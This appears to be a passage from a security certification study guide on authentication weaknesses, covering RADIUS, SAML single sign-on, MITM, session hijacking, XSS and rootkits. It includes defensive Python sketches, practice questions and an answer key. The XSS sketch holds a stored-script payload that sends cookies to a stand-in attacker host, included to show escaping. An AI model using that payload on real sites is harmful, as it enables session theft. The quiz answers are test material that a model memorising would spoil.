The Remote Authentication Dial-In User Service (RADIUS) is like TACACS+ in that both AAA protocols provide authentication services for administrators and users. However, whereas TACACS+ encrypts usernames and passwords during the authentication process, RADIUS only encrypts user passwords. Additionally, RADIUS uses UDP rather than TCP, meaning that reliability may suffer depending on network state. Because UDP is a best-effort transport protocol, it’s more difficult to determine when faults occur during the transaction. From a security point of view, this means that forging packets in spoofing attempts is easier because there is no confirmation of packet receipt. RADIUS also allows the use of a “shared secret” across the network; therefore, a breach of the entire network is far easier should any one weak endpoint be compromised. This, combined with the lack of complexity (or entropy) of the shared secret, means that offline attacks against the secret are more likely to succeed.
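Why the shared secret is such a high-value target becomes clearer from how RADIUS hides the User-Password attribute (RFC 2865, section 5.2): the password is padded to a 16-byte multiple and XORed, block by block, with MD5 digests chained from the shared secret and the request authenticator. This is obfuscation rather than strong encryption. A sketch, with an illustrative secret and authenticator:

```python
import hashlib

def radius_hide_password(password: bytes, shared_secret: bytes,
                         request_authenticator: bytes) -> bytes:
    """Hide a password per RFC 2865 section 5.2 (sketch)."""
    padded = password + b"\x00" * (-len(password) % 16)
    result, prev = b"", request_authenticator
    for i in range(0, len(padded), 16):
        digest = hashlib.md5(shared_secret + prev).digest()
        block = bytes(p ^ d for p, d in zip(padded[i:i + 16], digest))
        result += block
        prev = block  # chain the next digest off this ciphertext block
    return result

def radius_unhide_password(hidden: bytes, shared_secret: bytes,
                           request_authenticator: bytes) -> bytes:
    """Reverse the hiding; anyone holding the shared secret can do this."""
    result, prev = b"", request_authenticator
    for i in range(0, len(hidden), 16):
        digest = hashlib.md5(shared_secret + prev).digest()
        result += bytes(c ^ d for c, d in zip(hidden[i:i + 16], digest))
        prev = hidden[i:i + 16]
    return result.rstrip(b"\x00")

secret = b"shared-secret"          # illustrative values
authenticator = bytes(range(16))   # 16-byte request authenticator
hidden = radius_hide_password(b"hunter2", secret, authenticator)
print(radius_unhide_password(hidden, secret, authenticator))  # b'hunter2'
```

Because recovery requires only the shared secret and values visible on the wire, an offline guessing attack against a weak, network-wide secret exposes every password that crosses that RADIUS server.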

Some implementations of RADIUS are also susceptible to buffer-overflow attacks, which occur when too much data is forced into a memory space (or buffer) and the resulting excess spills outside of dedicated memory limits and into other areas of memory. This type of attack against the RADIUS system can be used to execute arbitrary malicious code, to leak sensitive user data, or as part of a denial-of-service attack.

Security Issues Associated with Federation and Single Sign-On

Federated identity is the concept of using a person’s digital identity to gain access to various services, often across multiple organizations. The identity is provided by a broker known as the federated identity manager. To verify her identity, the user needs only to authenticate with the manager; the application requesting the identity information must then trust the manager’s assertion. Many popular platforms, such as Google, Amazon, and Twitter, take advantage of their large memberships to provide federated identity services for third-party websites, saving the user from having to create separate accounts for each site.

Using a federated identity to provide authentication is often done with Single Sign-On (SSO). In a business setting, a user might have to provide credentials for e-mail, CRM, directory services, or any number of other business web applications. SSO simplifies the process of logging into multiple systems across a single organization by requiring the user to maintain only a single set of credentials, and it often ties into existing LDAP databases. SSO benefits both users and administrators. Users need to remember only a single password or PIN, which reduces the fatigue associated with managing multiple passwords, and they save time by not having to reenter credentials for every service. For the administrator, this means fewer calls about password problems. Figure 12-4 shows the flow of an SSO request using the Security Assertion Markup Language (SAML) standard, a widely used method of implementing SSO.

Images

Figure 12-4   Single Sign-On flow for a user-initiated request for identity verification

SAML provides access and authorization decisions using a system to exchange information between a user, the identity provider (IDP), and the service provider (SP). When a user requests access to a resource on the service provider, the SP creates a request for identity verification and sends it to the IDP. The IDP provides feedback about the user, and the SP can make its access control decision based on its own internal rules and the positive or negative response from the IDP. If access is granted, a token is generated in lieu of the actual credentials and passed on to the SP.
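
The Python sketch below models this exchange in miniature. It is not real SAML (which signs XML assertions with the IDP’s private key rather than a shared HMAC secret); the key, function names, and JSON “assertion” are hypothetical stand-ins meant only to show the trust relationship between IDP and SP:

```python
import hashlib
import hmac
import json
import time

# Hypothetical shared signing key; real SAML uses XML signatures
# with the IDP's private key instead.
IDP_KEY = b"idp-signing-key"

def idp_issue_assertion(username: str) -> dict:
    """The IDP vouches for the user by signing a short-lived assertion."""
    payload = json.dumps({"sub": username, "iat": int(time.time())}).encode()
    sig = hmac.new(IDP_KEY, payload, hashlib.sha256).hexdigest()
    return {"payload": payload.decode(), "sig": sig}

def sp_accept(assertion: dict) -> bool:
    """The SP verifies the IDP's signature before granting access;
    its own authorization rules would still apply on top of this."""
    expected = hmac.new(IDP_KEY, assertion["payload"].encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, assertion["sig"])

token = idp_issue_assertion("alice")
print(sp_accept(token))     # True: a valid assertion is accepted
token["payload"] = token["payload"].replace("alice", "mallory")
print(sp_accept(token))     # False: tampering breaks the signature
```

The key point the sketch captures is that the SP never sees the user’s credentials, only a verifiable statement from the IDP, which is exactly why compromise of the IDP is so damaging.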

Although SSO improves the user experience when accessing multiple systems, it does have a significant drawback in the potential increase in impact should the credentials be compromised. Using an SSO platform thus requires a greater focus on the protection of the user credentials. This is where including multiple factors and context-based solutions can provide strong protection against malicious activity. Furthermore, as SSO centralizes the authentication mechanism, that system becomes a critical asset and thus a target for attacks. Compromise of the SSO system, or loss of availability, means loss of access to the entire organization’s suite of applications that rely on the SSO system.

Manual vs. Automatic Provisioning/Deprovisioning

Provisioning is the coordination of efforts behind creating user accounts on a service and setting the appropriate roles and access associated with them. Part of what makes SSO so desirable for administrators is the ability to create and destroy accounts for services very rapidly. Auto-provisioning is a way to create accounts on the fly as users are authenticated to a new system. Auto-provisioning means that the IDP is asserting that the user should be allowed to hold an account with the SP. This clearly requires the SP to trust the IDP’s validation of users, which further illustrates the criticality of the IDP in this process. Controlling and consolidating access privileges is not an easy task, but we must be careful to control provisioning functions to control the size of our attack surface. Orphan accounts (those without an assigned owner) and accounts with incorrect levels of access can cause confusion for administrators if not managed correctly.
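
A minimal sketch of just-in-time auto-provisioning (with hypothetical names throughout) makes the trust relationship concrete: the SP mints an account purely on the strength of the IDP’s assertion.

```python
# Hypothetical account store keyed by username.
accounts: dict = {}

def jit_provision(assertion: dict) -> dict:
    """Create an account the first time a trusted assertion arrives
    for an unknown user; return the existing account otherwise."""
    username = assertion["sub"]
    if username not in accounts:
        # Trusting the IDP's claims here is exactly the risk described
        # above: a compromised IDP can mint accounts and roles at will.
        accounts[username] = {"roles": assertion.get("roles", ["user"]),
                              "owner_assigned": True}
    return accounts[username]

acct = jit_provision({"sub": "alice", "roles": ["finance"]})
print(acct["roles"])   # ['finance']
```

Note that a real deployment would also need deprovisioning logic; accounts created this way but never removed are precisely how orphan accounts accumulate.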

Self-Service Password Reset

One of the goals for a self-sustaining network is to remove the need for administrator intervention whenever possible. Traditionally, administrators spend an inordinate amount of time dealing with problems such as password resetting. Although it might not be problematic for the administrator of a small business to keep a close eye on this type of activity, it becomes challenging as the organization increases in size and complexity. Allowing users to reset their own passwords using an identity manager will allow administrators more time to focus on the rest of the network. However, by removing oversight into the reset process, you provide an opportunity for an attacker to take advantage.

Exploits

Why are authentication systems such a prime target for attackers? To answer this, we must remind ourselves that authentication is the process of validating identity and granting access to some number of resources. Once it accepts this information, a system will often make subsequent decisions on the basis of the initial credentials supplied by the client. If an attacker can fool a system with false or stolen credentials, he can assume the user’s identity and perform whatever tasks that user is authorized to do.

Impersonation

At the heart of the challenge is identifying and communicating just the right amount of information to the authentication system to make an accurate decision. These are machines after all, and they will never truly know who we are or what our intentions might be. They can only form a decision based on the information we give them and the clues about our behavior as we provide that data. If an attacker is clever enough to fabricate enough of this user information, he is effectively the same person in the eyes of the authentication system.

Sometimes attackers will impersonate a service to harvest credentials or intercept communications. Fooling a client can be done in one of several ways. First, if the server’s private key is stolen, the attacker can pose as the server without the client’s knowledge. Additionally, if an attacker can somehow get the client to trust him as a certificate authority (CA), or if the client fails to verify that the server’s certificate was issued by a trusted CA, the impersonation will be successful.

Man in the Middle

Essentially, MITM attacks are impersonation attacks that face both ways: the attacker impersonates both the client to the real server and the server to the real client. Acting as a proxy or relay, the attacker will use his position in the middle of the conversation between parties to collect credentials, capture traffic, or introduce false communications. Even with an encrypted connection, it’s possible to conduct an MITM attack that works similarly to an unencrypted attack. In the case of HTTPS, the client browser establishes an SSL connection with the attacker, and the attacker establishes a second SSL connection with the web server. The client may or may not see a warning about the validity of the server’s certificate. In the case that a warning appears, it’s very likely that the victim will ignore or click through the warning, which highlights the importance of user training. It’s also possible for the warning not to appear at all, which would indicate that the attacker has managed to get a certificate signed by a trusted Certificate Authority.
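
As an illustration of what triggers that warning, Python’s ssl module enables both of the relevant client-side checks by default; disabling either one in application code is the programmatic equivalent of clicking through the browser warning.

```python
import ssl

# The default context enables exactly the checks that make an HTTPS
# MITM visible to the client:
ctx = ssl.create_default_context()

# 1. The certificate chain must lead to a trusted CA.
print(ctx.verify_mode == ssl.CERT_REQUIRED)   # True

# 2. The certificate must match the hostname the client requested.
print(ctx.check_hostname)                     # True

# Some applications set verify_mode = ssl.CERT_NONE to silence errors;
# doing so lets any attacker-supplied certificate through unchecked.
```

This is why certificate validation bugs in client software are treated as serious vulnerabilities: they silently remove the only signal the user would otherwise receive.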

Session Hijack

Session hijacking is a class of attacks where an attacker takes advantage of valid session information, often by stealing and replaying it. HTTP traffic is stateless and often uses multiple TCP connections, so it uses sessions to keep track of client authentication. Session information is just a string of characters that appears in a cookie file, the URL itself, or other parts of the HTTP traffic. An attacker can get existing session information through traffic capture, MITM attack, or by predicting the session token information. Capturing and repeating session information is how an attacker might be able to take over, or hijack, the existing web session to impersonate a victim.
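
Token predictability is the crux of the prediction variant of this attack. The short Python sketch below contrasts a guessable token scheme with a CSPRNG-backed one; the names are hypothetical, but `secrets` is the standard library module intended for exactly this purpose:

```python
import secrets

def weak_token(counter: int) -> str:
    """Sequential tokens: an attacker who sees one can guess the next."""
    return f"sess-{counter:08d}"

def strong_token() -> str:
    """A CSPRNG-backed token; 32 bytes gives roughly 256 bits of entropy,
    making prediction infeasible in practice."""
    return secrets.token_urlsafe(32)

print(weak_token(41), "->", weak_token(42))   # sess-00000041 -> sess-00000042
print(len(strong_token()) >= 43)              # True
```

Unpredictable tokens defeat only the prediction avenue; capture and replay of a legitimate token still works unless the session is also bound to the client (for example, via TLS) and expired promptly.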

Cross-Site Scripting

Cross-site scripting (XSS) is a type of injection attack that leverages a user’s browser to execute malicious code that can access sensitive information in the user’s browser, such as passwords and session information. Because the malicious code appears to come from the site that the user is accessing, it’s difficult for the user’s browser to know that the code should not be trusted. XSS thus takes advantage of this inherent trust between browser and site to run the malicious code at the security level of the website. XSS comes in two forms: persistent and nonpersistent. With persistent attacks, malicious code is stored on a site, usually via message board or comment postings. When other users later browse the site, they unwittingly execute the code hidden in the previously posted content. Nonpersistent attacks, also referred to as reflected XSS, take advantage of server software that echoes user-supplied input back in its responses without sanitizing it. If an attacker notices such a vulnerability on a site, he can craft a special link which, when passed to and clicked on by other users, causes the browser to visit the site and reflect the attack back onto the victim. This could cause an inadvertent leak of session details or user information to whatever server the attacker specifies. These links are often passed along through e-mail and text messages and appear innocuous and legitimate.
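
Output encoding is the standard defense against both forms. The Python sketch below (the comment string and URL are hypothetical) shows how escaping turns stored script content into inert text before it reaches another user’s browser:

```python
import html

# A stored comment containing a script that would exfiltrate the
# session cookie of anyone who views the page (hypothetical URL).
comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Inserted verbatim, the comment becomes executable code in every
# victim's browser -- persistent XSS in a nutshell.
unsafe_page = f"<p>{comment}</p>"

# Escaped, the same input renders as harmless visible text.
safe_page = f"<p>{html.escape(comment)}</p>"

print("<script>" in unsafe_page)   # True
print("<script>" in safe_page)     # False: angle brackets became &lt; and &gt;
```

Most web frameworks apply this escaping automatically in their template engines; XSS bugs typically arise where developers bypass that escaping to emit “raw” HTML.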

Privilege Escalation

Privilege escalation is simply any action that allows a user to perform tasks she is not normally allowed to do. This is often done by exploiting a bug, implementation flaw, or misconfiguration. Escalation can happen in a vertical manner, meaning that a user gains the privileges of a higher-privilege user. Alternatively, horizontal privilege escalation can be performed to get the access of others in the same privilege level. Attackers will use these privileges to modify files, download sensitive information, or install malicious code.

Rootkits

Rootkits are among the most challenging types of malware because they are specially designed to maintain persistence and root-level access on a system without being detected. As with other types of malware, rootkits can be introduced by leveraging vulnerabilities to achieve privilege escalation and clandestine installation. Alternatively, they might be presented to a system as an update to BIOS or firmware. Rootkits are difficult to detect because they sometimes reside in the lower levels of operating systems, such as in device drivers and in the kernel, or even in computer hardware itself so the system cannot necessarily be trusted to report any modifications it has undergone.

Chapter Review

Recent breaches have highlighted several weaknesses in the authentication systems we use to protect privileged data. The subsequent access to personal and corporate data has resulted in damaging and expensive cybercrimes. The challenge is that attackers often use cracked or stolen user credentials to gain access—credentials that are assumed to come from a legitimate source. The reliance on just a login and password, or single-factor authentication, remains a key issue. Humans are terrible at picking and using passwords. Systems that use context-based authentication methods alongside multifactor authentication provide enhanced protection against malicious actors masquerading as legitimate users. However, as security professionals we must understand some drawbacks to using these systems as we work to make security more usable and transparent to users.

Questions

1.  Which of the following would not be a consideration in context-based authentication?

A.  The one-time passcode used for authentication was incorrect.

B.  The login attempt occurred outside of regular working hours.

C.  The transaction was initiated from a foreign country.

D.  The commands should have been manually entered, but they were issued faster than any human could type.

2.  In order to mitigate the security risks that your staff can pose to identity management, you would consider doing all the following except which one?

A.  Remind users never to share credentials with anyone else.

B.  Provide a demonstration of how their online identities can be stolen.

C.  Force complex passwords that must change every two months.

D.  Disable hyperlinks in e-mail messages.

3.  You are investigating an incident in which a user account in the accounting department appears to have deleted a critical marketing spreadsheet in a shared folder. Each department has its own VLAN and no other files appear to have been affected. The employee owning that user account claims to not know about this. What is the likeliest explanation?

A.  A workstation in the accounting department was probably compromised.

B.  The VLANs are not properly segmented.

C.  The roles associated with the account may have been inappropriate.

D.  The file server was likely compromised.

4.  Which of the following are features of the standard Kerberos authentication protocol? (Choose two.)

A.  It uses asymmetric encryption for authentication.

B.  It uses symmetric encryption for session security.

C.  It requires use of AS, KDC, and TGS.

D.  It requires use of AD, KDC, and GTS.

5.  Which of the following statements is not true of Single Sign-On (SSO) solutions?

A.  They decrease the impact of compromised credentials.

B.  Identities are verified by a federated identity manager or identity provider (IDP).

C.  They are widely implemented using the Security Assertion Markup Language (SAML).

D.  They reduce the number of passwords users have to memorize.

6.  Which of the following exploits is likely to trigger a certificate warning on the victim’s web browser if HTTPS is used in the connection?

A.  Session hijacking

B.  Cross-site scripting

C.  Man-in-the-middle

D.  SQL injection

Use the following scenario and illustration to answer Questions 7–10:

You are investigating a series of potentially unrelated incidents affecting a small business. Four hosts were involved in these events and are illustrated in the simplified network diagram.

Images

7.  The internal server’s logs recorded repeated login attempts to a domain administrator account from an external IP address suspected to be the attacker. These attempts were ultimately successful. The server is a domain controller implementing Kerberos. Which of the following is true?

A.  All objects and subjects in the domain are compromised.

B.  We only know that the internal server is compromised at this point.

C.  Any TGTs for the user at the workstation are now invalid.

D.  The external server will no longer be able to respond to requests from the workstation’s user.

8.  The workstation’s user learns of the compromised server and immediately changes the domain account’s password. Why will this be an ineffective response?

A.  The password would also have to be changed at the external server.

B.  Changing the password will prevent access to the external server.

C.  The password was not compromised, so it need not be changed.

D.  Changing the password will update the information on the compromised internal server, to which the attacker now has full access.

9.  The external server provides virtual private network (VPN) services for remote users. While examining NetFlow data at the firewall, you notice large flows on port 443 from the workstation to a remote user that are correlated to equally large flows on port 443 from the remote user to an external web server. What is likely happening?

A.  The remote user is an attacker who compromised the VPN server, pivoted to the workstation, and is now exfiltrating data.

B.  The remote user is the victim of a cross-site scripting attack.

C.  The remote user is simply visiting the same site as the workstation’s user and uploading similarly large files to it.

D.  The remote user is an attacker who compromised the VPN server and is now conducting a man-in-the-middle attack.

10.  You decide to investigate the VPN server and connect to it over SSH. You use netstat to examine network connections, ps to look at running processes, and find to look for newly created suspicious files. You find nothing out of the ordinary. What can you conclude?

A.  The VPN server appears to be secure and you should allow the remote user to connect again.

B.  You should also look for new user accounts and check your log files before reaching any conclusions.

C.  You can’t reach any conclusions strictly from built-in tools because a rootkit could interfere with their outputs.

D.  There must be a rootkit in play because you know the server was compromised.

Answers

1.  A. One-time passwords are not context sensitive, which means they wouldn’t fall into this type of authentication. The other options allude to issues of time, location, and behavior, all of which can play roles in context-based authentication.

2.  C. Complex and changing passwords may help improve security in many ways, but they will probably also increase the risk imposed by personnel to identity management because users are likely to adopt bad password practices such as writing them down or using variations of previous passwords.

3.  C. The likeliest among the given choices is that the user account had access to the shared folder and the user inadvertently deleted the file. Given that only one file was deleted, it is unlikely that this would indicate a compromise, and even if the VLANs were incorrectly implemented, that should not have allowed that user account to delete the file.

4.  B, C. Though some implementations of Kerberos support the optional use of asymmetric encryption, the standard does not. Furthermore, sessions are always secured using symmetric encryption. The key components of a Kerberos implementation are the Authentication Server (AS), the Key Distribution Center (KDC), the Ticket Granting Server (TGS), and the Service Servers (SS).

5.  A. The main disadvantage of Single Sign-On (SSO) is that compromised credentials will affect multiple systems.

6.  C. A man-in-the-middle attack involving an HTTPS connection will generate a certificate warning on the victim’s browser unless the attacker has stolen the target server’s private key, which is very rare. None of the other exploits will normally generate such warnings.

7.  A. Because Kerberos centralizes secret keys and is implemented domain-wide, all secret keys should be considered compromised at this point since the attacker controls the Kerberos server.

8.  D. The main disadvantage of Kerberos is that it centralizes all the secret keys in the Key Distribution Center (KDC). Any domain password changes and changes to the secret keys will be available to the attacker who now controls the server.

9.  D. In a man-in-the-middle attack, traffic is commonly relayed through a malicious host to the legitimate endpoints. It is easiest to conduct this type of attack from the local network, so it makes the most sense to conclude that the attacker leveraged compromised VPN credentials and is now intercepting all of the workstation’s user traffic to and from the website.

10.  C. Rootkits will prevent system tools from accurately reporting the state of a computer. If these tools had reported evidence of compromise, you could conclude that an attack took place. However, finding no evidence is no reason to conclude that there is no compromise.
